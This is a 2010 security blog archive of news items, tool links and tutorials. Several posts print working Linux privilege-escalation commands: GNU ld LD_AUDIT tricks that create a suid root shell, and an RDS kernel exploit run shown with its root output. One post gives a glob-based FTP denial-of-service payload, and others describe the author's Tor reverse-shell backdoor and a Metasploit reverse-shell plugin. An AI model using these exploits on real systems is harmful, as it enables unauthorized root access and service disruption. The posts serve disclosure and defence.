Thursday, October 28, 2010

Wednesday, October 27, 2010

Firefox 0day was found on the Novel Peace Prize website

A hidden iframe on nobelpeaceprize.org was exploiting a Firefox 0day vulnerability via an exploit-pack.

According to Einar Oftedal, a detection executive at Norman ASA in Oslo, the official website for the Nobel Peace prize, nobelpeaceprize.org, was compromised so that it contained an iframe link to a malicious server.
“This iframe has a multi exploit backend and serves exploits for Firefox, including a working remote exploit for firefox 3.6.11,” he said in an instant message to The Register. “We didn't see any 0day for IE,” he added, referring to Microsoft's browser.


More information:
darknet
Information Security News mailing list

Tuesday, October 26, 2010

FUD in the IDS market

There has been a lot of  FUD going on in the IDS/IPS market. Stonesoft has launched a campaign saying that their product is the only able to stop some advanced attacks that are not public.

I am not an expert in the field, but there are two things that worry me:

  • Somebody saying that they can stop all the advanced attacks with "anti evasion techniques", but the are no details or whatsoever.
  • All the competitors are not able to achieve the same results.
For me, it looks like a nasty FUD trying to gain some market in the short term, but history has demonstrated that it is a bad strategy.

Anyway, I always trust people that openly discusses the problems, like researchers and open source developers.


Some comments from SourceFire
Some lolz from Daily Dave mailing list

Monday, October 25, 2010

Nessus scan through a socks Meterpreter pivot

Great article from digininja.org that explains how to scan a target network with Nessus through a Meterpreter session.

It is achieved by setting up a pivot and using the auxiliary/server/socks4 a module.  Since the  Nessus server does not natively support socks, we have to use a wrapper like proxychains or socksify, as explained in the article.

Friday, October 22, 2010

GNU ld dlopen privilege escalation

For second time this week, Tavis  Ormandy  has sent a 'bomb' to a full disclosure list in form of Linux privilege escalation with GNU ld.

In a nutshell, the problem is the following:
LD_PRELOAD is:
A whitespace-separated list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to selectively override functions in other shared libraries. For set-user-ID/set-group-ID ELF binaries, only libraries in the standard search directories that are also set- user-ID will be loaded.
But, this is not the case with LD_AUDIT. Basically, you can load any library when executing a suid program, that will be executed with root permissions! The attack consists in finding an arbitrary library that will write a file to disk, that will be owned by root in case of executing a suid program.


The final trick is that the newly created process will inherit parent's umask. What does it mean? We can change the umask in our shell and then create a world writeable file with root rights!

A regular user being able to write files with root permissions is really a bad thing...  It means that you can create an arbitrary shell script that will be executed by Cron with root rights.  Yes, an instant root shell in the system!

The attack:

$ umask 0
#arbitrary suid program
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
# This library writes a file to disk when the PCPROFILE_OUTPUT
# environment variable is defined.
# There is another example with the liblftp-tasks library and
# the LFTP_HOME environment variable.
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
/etc/cron.d/exploit
# Create an arbitrary but valid crontab(5) line in the file and wait for the execution
# This attack creates a suid shell named /tmp/exploit.
$ /tmp/exploit
# whoami
root

UPDATE:  Using crontab files is not an option because Cron does not accept files that are group or world writable. The attacker must look for other options.

UPDATE: It is possible to upload an arbitrary library that will be loaded with root privileges, dropping a root shell.

Thursday, October 21, 2010

Integrating Hydra with Nessus

Nice video from Paul Asadoorian in the tenablesecurity blog .

The blog post discusses how to integrate Hydra with Nessus  to run brute force attacks against your infrastructure: installing hydra and configuring Nessus.

The post also points to different good resources to get your list of users and passwords that will be used to perform the brute force attack.

Malware Pushers Abuse Firefox Warning Page

Nice post from Darknet that discusses a new technique used by attackers to trick the user into installing scareware.

I quote,

Hackers have subverted warnings generated by Firefox about dangerous sites to punt fake anti-virus portals.
Surfers straying onto a web page offering the “Security Tool” rogue anti-virus are offered a warning page that convincingly mimics the genuine Firefox block page. The site offers supposed updates for Mozilla’s technology that are actually scareware packages.
If Windows users apply these updates they will be falsely warned that their system is infected and continuously nagged into buying worthless scareware packages that serve only to line the pockets of cyber-scammers.
The rogue application will automatically attempt to install itself on the machines of prospective marks in cases where scripts are enabled, net security firm F-Secure warns.
Definitively, it is a really clever social engineering attack,  that will trick the users into thinking that they just got infected and they have to install this new antivirus that is already alerting about infections.

Persistence Registry keys and Windows Incident Response

The Sans Computer Forensics blog discusses how to query certain registry keys to find secondary indicators of a compromise.

Dave Hull has created a list of registry keys that can be used to run malware at boot time. He used AutoRuns from Microsoft Sysinternals to pull the list of registry keys.

The list of keys are available :


XPSP3_HKCU_Startup_Locations.txt - cannot be remotely queried
XPSP3_HKLM_Startup_Locations.txt - can be remotely queried

Privilege escalation in the Linux kernel

H security has informed about the second privilege escalation in Linux this week (the first is an error in the ld linker) with CVE-2010-3904 .

They point to the advisory as well as the PoC.

On October 13th, VSR identified a vulnerability in the RDS protocol, as implemented in the Linux kernel. Because kernel functions responsible for copying data between kernel and user space failed to verify that a user-provided address actually resided in the user segment, a local attacker could issue specially crafted socket function calls to write arbitrary values into kernel memory. By leveraging this capability, it is possible for unprivileged users to escalate privileges to root. 


I have tested it in an old Ubuntu 10.10 RC vmware image and it worked.
Ubuntu's advisory published on October 19th.


msk@ubuntu:~$ gcc -o test linux-rds-exploit.c
msk@ubuntu:~$ ./test
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved rds_proto_ops to 0xe09d6a40
 [+] Resolved rds_ioctl to 0xe09d0000
 [+] Resolved commit_creds to 0xc016c340
 [+] Resolved prepare_kernel_cred to 0xc016c790
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)


I have checked the advisory published by RedHat and seems that RHEL  is not affected, ( RHEL 3 and 4 for sure) or I did not manage to make it work.

Debian seems to have a vulnerable kernel only in unstable (squeeze) and sid. The advisory marks all the versions as vulnerable but it should be false because stable and backports does not support RDS.

Wednesday, October 20, 2010

Honeypot for vulnerable web applications

The Honeynet Project informs that GlastopfNG  has been released. GlastopfNg is a honeypot that simulates vulnerable web servers /applications to fully understand the attacks.

GlastopfNG is a honeypot specialized on simulating a vulnerable web server/application to become a target of automated and even manual attacks. Instead of trying to block these attacks GlastopfNG tries to get as much information as possible about the attacker and the used attack itself. This gathered information can then be used in different ways to protect real applications in the future against such attacks. Today it's for example already used by hosting providers to inform owners of servers, which are attacking other servers on the Internet, that it's very likely, that their server has been hacked. This is a great additional service for their customers and can be done in a mainly automated way.

More information available in the paper.
It can be downloaded from here.

Presentation about botnets in SIGINT'10, Koln

SIGINT'10 took place between the 22nd and the 24th of May in Koln, Germany. The videos are also available and hosted by ccc.

I just saw the presentation made by Thorsten Holz and called 'Botnets in 2010 - Status Quo and Future Threats'.

As a quick resume, it does a quick introduction to the botnets and its arquitecture and then talks about Storm Worm and Waledac.

Storm Worm
  • Not centralized C & C thanks to p2p
  • Fast flux domains
  • Uses infected computers with public IP addresses to proxy the content back to the backend: spam pages or with exploit packs. It is hard to track  and offers high availability.
  • The nated machines are user to send spam and dos attacks.
  • Template based spamming. The template is sent to the bots that then send the spam.
  • Mitigation: join the network and disrupt the communication channel between the bots (Stormfucker in 25c3 CCC)
Waledac
  • Successor of Storm Worm and perhaps created by the same group
  • Uses HTTP to tunnel trafic (major change) between the nated machines and the repeaters
  • multi-tier architecture ('hybrid' p2p), like storm worm
  • Static backend servers that host the content
  • Fast flux domains for C&C
  • Template based spamming.
  • The mitigation effort was called 'Operation b49' and took down the botnet in February 2010.



The video can be found here.

Tuesday, October 19, 2010

Java being massively exploited

Yes, not only Adobe is being targeted in Windows platforms even though they are making things easy for the black hats :D

As Brian Krebs says, Microsoft is warning about attacks against Java, with vulnerabilities that date back to 2008 (I have investigated attacks that used vulnerabilities patched back in 2006 and continue to be very effective)!

CVE-2008-5353 - 1,196,480 computers infected.
CVE-2009-3867 - 1,119,191 computers infected
CVE-2010-0094 -   173,123 computers infected.

Microsoft says that it kind of makes sense because Java is widely installed and nobody thinks to update it, like Adobe Acrobat. So, it is a nice candidate to be added to exploit packs and get a nice infection rate ;)

GNU ld privilege escalation

Following this post in a full disclosure list, I know about the privilege escalation  in the GNU ld linker.

Some how, it seems to be RedHat centric or a didn't manage to make it work in Debian/Ubuntu.

This is the exploit being executed in an up to date Centos 5.5

bash-3.2$ ls
exploit  payload.c  test.sh
bash-3.2$ cat test.sh
rm -rf /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

bash-3.2$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
bash-3.2$ sh test.sh
[root@localhost tmp]# cat /etc/redhat-release
CentOS release 5.5 (Final)
[root@localhost tmp]# id
uid=0(root) gid=99(nobody) groups=99(nobody) context=root:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost tmp]#

It does  not seem to work in Ubuntu 10.10:

msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
kernel.yama.protected_sticky_symlinks = 0
msk@ubuntu:/tmp$ sudo sysctl -w kernel.yama.protected_nonaccess_hardlinks=0
kernel.yama.protected_nonaccess_hardlinks = 0
msk@ubuntu:/tmp$ sh test.sh
Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!
msk@ubuntu:/tmp$




Resources for Building Incident Response Teams

Richard Bejtlich posts some resources for building an Incident Response Team.

New version of Metasploit Unleashed

The guys of offensive-security have updated their online curse. Metasploit Unleashed

You can find more information in their blog post.

Friday, October 15, 2010

Windows hardening: EMET

EMET (Microsoft's Enhanced Mitigation Experience Toolkit) is a tool that enables the security features that are not enabled by default on the applications. Unfortunately, Windows leaves the applications choose which security features should be enabled by setting specific flags, so many attacks can succeed  even though the security protections are enabled in the operative system.

In a nutshell, EMET is a DLL that permits to enable the security features in runtime, for applications that were compiled without it, like DEP (Data Execution Prevention) and ASLR (Address Layout Space Randomization).

You can find more information about this tool as well as examples in this article from H Security.



Tshark Fu: decrypting SSL streams

Nice article from Pauldotcom about  decrypting SSL streams with tshark, that is focused on HTTPS servers.

The article is easy to follow and explains the full process as well as the problems they found. The following points were particularly interesting:

Convert the certificate from PKCS#8 to PKCS#1
I understand that the private key must be  in PKCS1  because it is the only format understood by tshark.

openssl pkcs8 -in private.key -out rsaprivate.key -nocrypt

This point is particularly confusing... I found the following entry in the Wireshark mailing list that explains this problem.


Tshark output and the HTTP parser

The following command decrypts the stream and parses the output with tshark's internal HTTP parser.

tshark -o "ssl.desegment_ssl_records: TRUE"  \
-o "ssl.desegment_ssl_application_data: TRUE" \
-o "ssl.keys_list:,443,http,rsa_private.key"  \
-o "ssl.debug_file:rsa_private.log" -r all.pcap  \
 -R "(tcp.port eq 443)" -V


This behavior can be changed  if we want to read the raw data. This is achieved by modifying the flags in the third parameter, so we have data instead of  http

-o "ssl.keys_list:,443,data,rsa_private.key"


Thursday, October 14, 2010

Evercookies: evil user tracking

Many web browsers permit the users to delete the cookies, and this makes tracking user's behavior  more difficult. But, an evil mind thought that using other storage areas that are not meant for storing cookies could bypass the control mechanisms.

An evercookie is defined as:
Evercookie is a javascript API available that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. 
evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available on the local browser. Additionally, if evercookie has found the user has removed any of the types of cookies in question, it recreates them using each mechanism available.


Jeremiah Grossman points out in his article to an evercookie demo and to the attempts  made by Dominic White to defeat this tracking system. Dominic comments that Firefox should be safe by default (?) but Safari not, and he created shell script that deletes the temporary files.

Apparently,  Jeremiah found a way to remove this cookies in Google Chrome and only using the GUI. It is achieved by disabling the Silverlight and Flash storage settings.

Security websites attacked and public disclosure

Yes, gangs does not like their dirty laundry being made public because they want to keep working anonymously and, of course, they tend to go mad when somebody researches their activities and practices public disclosure.

Past September 23rd, Brian Krebs published a story called 'I’ll Take Two MasterCards and a Visa, Please' that appeared in main stream websites and led to take down the gang's website, that was used as a market place to sell stolen credit cards.

24 hours later, his website suffered a DoS attack with an average of 2.3 Gb and at least one IP address that belongs to Microsoft was involved. As Krebs comments in his article Pill Gang Used Microsoft’s Network in Attack on KrebsOnSecurity.com, turns out that many computers in Microsoft's net-block have been compromised for weeks and used  to route pharmacy spam sites that belong to Russian gangs.

I found particularly funny and ironic this paragraph,
 In just one of the many ironies in this story, the compromised server inside of Microsoft appears to have been running Linux, not one of Microsoft’s server technologies. According to Guilmette, all of the hacked servers used by this pill gang are Unix or Linux servers. This mode of operation matches that of “Bulker.biz,” a rogue pharmacy affiliate program known for promoting rogue “Canadian Health&Care Mall” pill sites — as well as a number of other brands — by hijacking poorly-secured Linux and Unix servers.

And the answer  from Microsoft,
Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.

Tuesday, October 12, 2010

A packet repository at the University of Twente

I have read from Richard Bejtlich's Twitter  and from the Argus' Mailing list about the packet repository maintained by the University of Twente.

A quote from the wiki page,
From this location you can download anonymized packet headers (tcpdump/libcap), Netflow version 5 data and a Labeled Dataset for Intrusion Detection. Data is taken from various locations in the Netherlands. More information on the data collection and anonymization procedures can be found here.

Quick introduction to malware analysis

This post from Lenny Zeltser in the Sans Forensics Blog  introduces the whole process of malware analysis.

The post can be resumed with the following points:

  • Behavioral analysis (dynamic analysis). Helps to  understand how the malware interacts with the local and remote systems by running it in a controlled environment.
  • Code analysis (static analysis).  Decompile the binary  and analyze the malware at assembler level with the help of a debugger.
  • Memory analysis.  This method is related to the behavioral analysis because the investigator dumps the contents of the memory for further examination. This will help to spot hidden code as well as better understand how the malware behaves.

I also would add network analysis because it helps to understand how the local system interacts with remote systems, like a C &C server.  Many times the investigator must examine malware that was found in a live system and having a network capture may be handy.


Metasploit megaprimer: 300 minutes of video tutorials

Awesome post in ethicalhacker.net with more than 300 minutes of video tutorials. I point to the original resources instead of using the url shortening service that appears in the post.

1. Metasploit Megaprimer (Exploitation Basics and need for Metasploit) Part 1

http://securitytube.net/Metasploit-Megaprimer-(Exploitation-Basics-and-need-for-Metasploit)-Part-1-video.aspx

2. Metasploit Megaprimer (Getting Started with Metasploit) Part 2

http://securitytube.net/Metasploit-Megaprimer-(Getting-Started-with-Metasploit)-Part-2-video.aspx

3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)

http://securitytube.net/Metasploit-Megaprimer-Part-3-(Meterpreter-Basics-and-using-Stdapi)-video.aspx

4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)

http://securitytube.net/Metasploit-Megaprimer-Part-4-(Meterpreter-Extensions-Stdapi-and-Priv)-video.aspx

5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)

http://securitytube.net/Metasploit-Megaprimer-Part-5-(Understanding-Windows-Tokens-and-Meterpreter-Incognito)-video.aspx

6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)

http://securitytube.net/Metasploit-Megaprimer-Part-6-(Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts)-video.aspx

7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)

http://securitytube.net/Metasploit-Megaprimer-Part-6-(Espia-and-Sniffer-Extensions-with-Meterpreter-Scripts)-video.aspx

8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)

http://securitytube.net/Metasploit-Megaprimer-Part-8-(Post-Exploitation-Kung-Fu)-video.aspx

9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)

http://securitytube.net/Metasploit-Megaprimer-Part-9-(Post-Exploitation-Privilege-Escalation)-video.aspx

10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)

http://securitytube.net/Metasploit-Megaprimer-Part-10-(Post-Exploitation-Log-Deletion-and-AV-Killing)-video.aspx

11. Metasploit Megaprimer (Post Exploitation and Stealing Data) Part 11

http://securitytube.net/Metasploit-Megaprimer-(Post-Exploitation-and-Stealing-Data)-Part-11-video.aspx

12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)

http://securitytube.net/Metasploit-Megaprimer-Part-12-(Post-Exploitation-Backdoors-and-Rootkits)-video.aspx

13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)

http://securitytube.net/Metasploit-Megaprimer-Part-13-(Post-Exploitation-Pivoting-and-Port-Forwarding)-video.aspx

14. Metasploit Megaprimer Part 14 (Backdooring Executables)

http://securitytube.net/Metasploit-Megaprimer-Part-14-(Backdooring-Executables)-video.aspx

15. Metasploit Megaprimer Part 15 (Auxiliary Modules)

http://securitytube.net/Metasploit-Megaprimer-Part-15-(Auxiliary-Modules)-video.aspx

16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)

http://securitytube.net/Metasploit-Megaprimer-Part-16-(Pass-the-Hash-Attack)-video.aspx

Monday, October 11, 2010

Real time Google Hacking

Probably everybody know that Google restricts the searches to prevent people from launching automated searches and finding sensitive data.  The interesting part is that the Google services do not have this restriction, so you could crawl their database to find many dorks. :)

The guys of  Pauldotcom comment on their blog this behavior. Rob Ragan  and Francis Brown ( the  Bing/Google Hackers  at Defcon ) have  done some  research in search engine hacking  with amazing results. I quote the article,

They took the entire Google Hacking Database, Foundstone Hacking Database and their new BING Hacking Database and turned them into Google READER RSS feeds. As soon as Google or BING indexes a new site that matches your "intitle:Index Of passwords" criteria Google reader adds it to your RSS feed. (Your Google reader is able to get BING results by leveraging BING's &format=rss parameter) As a result, Google and BING are constantly searching for all the Googledorks in the database and maintaining a realtime database of the results! Then Rob and Francis exported their RSS feeds to OPML format so you can just import them into your own Google reader account.

You can find the project website here.

Saturday, October 9, 2010

Friday, October 8, 2010

Adobe to add a sandbox in Adobe Reader

Darknet points out to the sandbox that is being implemented in Adobe Reader and will be available in the next major release.

There is no doubt that this software is the most targeted Windows software nowadays. As Brian Krebs said , the last patch cycle had  23 patches!

Reading the implementation details in Darknet's post:
The new Reader design will see core and risky PDF functions such as font rendering, Javascript execution, 3D rendering and image parsing happen within the confines of the application itself, isolating these from the privileges of the operating system.
This effectively relegates Reader to a new rung of privilege below that if the system user, which stops the application simply accessing key parts of the OS such as the Registry or file system as it likes. Instead all such calls will have to go through a trusted broker process if they want to communicate beyond the sandbox.

Flaw in glob function implementation put FTP servers at risk

H Security reports a DoS vulnerability that affects many FTP servers. These servers relay in a flawed implementation of the glob function, that is vulnerable to a resource exhaustion attack.

Quoting H Security,

The problem exists because GLOB_LIMIT, a feature added in 2001 to limit the amount of memory used by the glob() function is ineffective. Globbing, as it is called, calls on the glob() function to match wildcard patterns when generating a list of matching file names. Because GLOB_LIMIT is not effective, it potentially allows a system's main memory to be flooded when processing certain patterns and this may, depending on the hardware used, cause the system to become very slow, cease to respond or even crash as a result.

Maksymilian Arciemowicz, the researcher that published the advisory (Also published in exploit-db.com),  reported that the main BSD operative systems are affected (OpenBSD, NetBSD, FreeBSD and Solaris) as well as GNU libc.

The advisory confirms that the vulnerability is easily exploitable:


GLOB_LIMIT
protect us before attacks like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
because glob will find more patches as in GLOB_LIMIT declared. Anyway, if
we use path what do not exists (with */.. strings) like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha
GLOB_LIMIT will be never overflowed. Many combinations of paths, will
execute this proces a long time. We can also try allocate
(GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB
Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-
EXPORT NOTICE

...
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx

this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described in
vulnerability for glibc strfmon(3)

Thursday, October 7, 2010

Security Incident Cycle and common Incident Management mistakes

Nice post  from the Sans Computer Forensics Blog about the Security Incident Cycle and how organizations struggle to follow the steps.

This post was inspired by Richard  Bejtlich's presentation in the Forensics Incident Response Summit 2010

Links: Richard Bejtlich's Presentation

LUKS encrypted disk forensics

This great article from Sans Computer Forensics  shows how to perform forensics investigations in a disk image that contains LUKS volumes.

The following tricks appear in the article:
  • Use 'losetup' to create a read-only logical device pointing to the LUKS partition.
  • Use 'cryptsetup' to verify that the partitions is LUKS and then mount it.
  • LVM2 Fu to load/unload the Volum Groups

Linux USB policies

Many people don't know this, but the Linux kernel allows the administrators to enable/disable the use of USB devices in the system;  per device or with a default policy (that is allow everything by default).

Authorize a device to connect:  
        $ echo 1 > /sys/bus/usb/devices/DEVICE/authorized
 
Deauthorize a device: 
        $ echo 0 > /sys/bus/usb/devices/DEVICE/authorized
 
Set new devices connected to hostX to be deauthorized by default (ie:  lock down):
        $ echo 0 > /sys/bus/usb/devices/usbX/authorized_default
 
Remove the lock down: 
        $ echo 1 > /sys/bus/usb/devices/usbX/authorized_default


For more information:
http://www.mjmwired.net/kernel/Documentation/usb/authorization.txt


It is also possible to disable all the storage devices by disabling the kernel module. Yes,  old school :D

Just adding the following entry to /etc/rc.local

rmmod usb_storage




Tuesday, October 5, 2010

Hard times for ASP.NET

On September 28th  Microsoft published the bulletin MS10-070 that fixed a information disclosure in ASP.NET  ( the .NET framework).

As David Aitel pointed out,

It's your basic massive break-the-internet nightmare, that Microsoft has avoided for many years since Code Red and the rest of the big worms ran rampant on IIS. It's interesting that this time around it's not a buffer overflow.


Looks like some people is having lots of fun lately and many system administrators are going to have a hard time.

ISC also dedicated an entry in the Diary.
In Microsoft .NET Framework 3.5 Service Pack 1 and above, this vulnerability can be used by an attacker to retrieve the contents of any file within the ASP.NET application, including web.config"   and  "This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server.
According to the bulletin, MSFT are aware of "active attacks".

If this is not enough,  Packet Storm Security published a proof  of concept  that exploits this vulnerability.

 Proof of concept exploit that demonstrates the downloading of Web.config. This affects unpatched versions of .NET framework 3.5 Sp1. Full details are available on the homepage. 

PHP code deobfuscation

The zscaler weblog  describes how to use  Evalhook from Steffan Esser to  deobfuscate PHP code.

They point to the following article that explains how the tool works.

From Steffan Esser's article:
Whenever encoders like php-crypt have to be analysed the task is usually the same. You take the script, replace all calls to eval() with die() and check what it tries to eval(). When it looks safe you will replace the eval() with the evaluated code and repeat. This is a very stupid and time consuming work, especially when there are multiple wrappers of eval(). Therefore I wrote a short PHP extension called evalhook that helps with this task.

Saturday, October 2, 2010

Having fun with game servers

Past week I was bored and I needed to do something to keep me busy. I thought it would be nice to write a simple script that monitors my favorite game servers (Wolfenstein: Enemy Territory), so I know which map is currently being played as well as the number of players.

I wrote two scripts: the first one is the desktop version and the second one for my Android telephone.  It took me only some hours to finish, so it is not impressive but it was funny :D

The desktop version uses libnotify to pop-up a window everytime a new map is being played. It displays the map name and the number of used slots for each server.


The Android version does pretty much the same but alerts me, vibrating or with text to speech, when one of the servers is unreachable.

F-secure: Stuxnet Questions and Answers

Nice article from F-secure about the Stuxnet worm.

It helps to easily understand which systems it is targeting and the attack vectors used.

Podcasts in German

I have been trying to learn German since one year ago and I thought it would be nice to listen to podcasts just to improve my skills. German is not that easy, ok? :D

I have been looking for some podcasts related to IT so I have an extra interest to play atention and keep trying.

Chaos Radio
http://chaosradio.ccc.de/chaosradio-latest.rss

Chaos Express
http://chaosradio.ccc.de/chaosradio_express-latest.rss

/dev/radio
http://ulm.ccc.de/dev/radio/podcast.xml

Fnordfunk
http://fnordfunk.cccmz.de/index.php?/feeds/index.rss2

Hackerfunk
http://www.hackerfunk.ch/podcast.php

NerdAlert Podcast (Mp3)
http://nerdalert.de/feeds/podcast-mp3.xml

radio chaotica podcast
http://entropia.de/podcast.xml

RadioTux GNU/Linux
http://blog.radiotux.de/radiotux/podcast/feed/

www.c3d2.de Newsfeed
http://www.c3d2.de/news-rss.xml

Reverse HTTP evilness

Some months ago I heard people talking about using Tor to anonymously scan your target network by using the SOCKS interface and sockifying tools like NMAP, etc.

What amazed  me was the  Tor backdoor   that the guys of Carnal Ownage created. Unfortunately, it is only meant for Windows environments because it is the main platform that pentesters are working with.

I came up with the idea of making something (a crappy script in my case) that could be executed easily in a Unix environment. Basically, I borrowed some RSA and Blowfish code implemented in Python and I created a reverse http shell that encrypts all the traffic.


This script also permits to upload and download  small files. Unfortunately, Python is too ineficient in this case and it will use all the resources available in the computer. Forget about using this method to upload your toolkit :D

The most interesting part is that it can use a HTTP Tor proxy to connect to a hidden service, so you can run a reverse backdoor and the destination will not be identified. Of course, I coded this script for fun and it should only be used for educational puposes and to show how difficult is to defend a network (and easly to fly under the radar if you have some skills).


The code is not finished yet because I have been too busy since then, but it works :D

I think it is a good way to teach people that they do not have to relay on tools to defend their networks. They have to understand that they are going to be compromised soon or later and they have to desing their networks and strategies to identify the existing compromise and respond to the incident as quick as possible.

Metasploit and local file inclusion

I am not a super skilled hacker (probably I am the opposite ), but one thing I have is the mindset. Whenever I read something interesting,  I want to go beyond and I keep thinking about it until I come up with something.

Long time ago I read about an interesting project called  FIMAP that is meant to exploit LFI (Local File Inclusions) in web servers, mainly PHP.

I thought that would be nice to integrate it somehow with Metaspoit because it is the framework that many people is using nowadays. It took me some time to write a Python wrapper that creates/encodes payloads and communicates with Metasploit using XMLRPC.


As a result, we have a Fimap plugin that interacts with a running Metasploit console and pops up  a reverse shell, for Windows and Unix. I had to make some changes with their help because I am not a skilled programmer and I didn't know how to implement a plugin system. I think it was a great experience!

The original code in my subversion repository.